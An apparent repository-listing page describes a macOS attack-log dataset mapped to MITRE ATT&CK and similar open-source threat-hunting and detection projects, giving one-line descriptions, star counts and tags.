sbousseaden / Macos Attack Dataset
JSON DataSet for macOS mapped to MITRE ATT&CK Tactics.
Stars: ✭ 116
Projects that are alternatives of or similar to Macos Attack Dataset
ETWNetMonv3
ETWNetMonv3 is simple C# code for Monitoring TCP Network Connection via ETW & ETWProcessMon/2 is for Monitoring Process/Thread/Memory/Imageloads/TCPIP via ETW + Detection for Remote-Thread-Injection & Payload Detection by VirtualMemAlloc Events (in-memory) etc.
Stars: ✭ 32 (-72.41%)
Mutual labels: detection, threat-hunting, blueteam
Pcap Attack
PCAP Samples for Different Post Exploitation Techniques
Stars: ✭ 175 (+50.86%)
Mutual labels: detection, threat-hunting, mitre-attack
Sentinel Attack
Tools to rapidly deploy a threat hunting capability on Azure Sentinel that leverages Sysmon and MITRE ATT&CK
Stars: ✭ 676 (+482.76%)
Mutual labels: detection, threat-hunting, mitre-attack
MindMaps
#ThreatHunting #DFIR #Malware #Detection Mind Maps
Stars: ✭ 224 (+93.1%)
Mutual labels: detection, threat-hunting
S2AN
S2AN - Mapper of Sigma/Suricata Rules/Signatures ➡️ MITRE ATT&CK Navigator
Stars: ✭ 70 (-39.66%)
Mutual labels: threat-hunting, mitre-attack
thremulation-station
Small-scale threat emulation and detection range built on Elastic and Atomic Redteam.
Stars: ✭ 28 (-75.86%)
Mutual labels: threat-hunting, elastic
Attackdatamap
A datasource assessment on an event level to show potential coverage or the MITRE ATT&CK framework
Stars: ✭ 264 (+127.59%)
Mutual labels: threat-hunting, mitre-attack
ETWProcessMon2
ETWProcessMon2 is for Monitoring Process/Thread/Memory/Imageloads/TCPIP via ETW + Detection for Remote-Thread-Injection & Payload Detection by VirtualMemAlloc Events (in-memory) etc.
Stars: ✭ 55 (-52.59%)
Mutual labels: detection, blueteam
Auditd Attack
A Linux Auditd rule set mapped to MITRE's Attack Framework
Stars: ✭ 642 (+453.45%)
Mutual labels: threat-hunting, mitre-attack
Threathunting
A Splunk app mapped to MITRE ATT&CK to guide your threat hunts
Stars: ✭ 738 (+536.21%)
Mutual labels: threat-hunting, mitre-attack
SIGMA-detection-rules
Set of SIGMA rules (>250) mapped to MITRE Att@k tactic and techniques
Stars: ✭ 97 (-16.38%)
Mutual labels: threat-hunting, mitre-attack
Bluespawn
An Active Defense and EDR software to empower Blue Teams
Stars: ✭ 737 (+535.34%)
Mutual labels: threat-hunting, mitre-attack
Sysmon Modular
A repository of sysmon configuration modules
Stars: ✭ 1,229 (+959.48%)
Mutual labels: threat-hunting, mitre-attack
BLUELAY
Searches online paste sites for certain search terms which can indicate a possible data breach.
Stars: ✭ 24 (-79.31%)
Mutual labels: threat-hunting, blueteam
ELK-Hunting
Threat Hunting with ELK Workshop (InfoSecWorld 2017)
Stars: ✭ 58 (-50%)
Mutual labels: threat-hunting, elastic
Malwless
Test Blue Team detections without running any attack.
Stars: ✭ 215 (+85.34%)
Mutual labels: blueteam, mitre-attack
Threathunt
ThreatHunt is a PowerShell repository that allows you to train your threat hunting skills.
Stars: ✭ 92 (-20.69%)
Mutual labels: threat-hunting, blueteam
Evtx Attack Samples
Windows Events Attack Samples
Stars: ✭ 1,243 (+971.55%)
Mutual labels: threat-hunting, mitre-attack
macOS-ATTACK-DATASET
JSON DATASET for macOS mapped to MITRE ATT&CK Techniques and Tactics recorded using Elastic Endpoint Security for macOS.
N.B. for community contributions any forms of logs collection and formats are acceptable (preference for JSON).
License
macOS-ATTACK-DATASET's GNU General Public License
Note that the project description data, including the texts, logos, images, and/or trademarks,
for each open source project belongs to its rightful owner.
If you wish to add or remove any projects, please contact us at [email protected].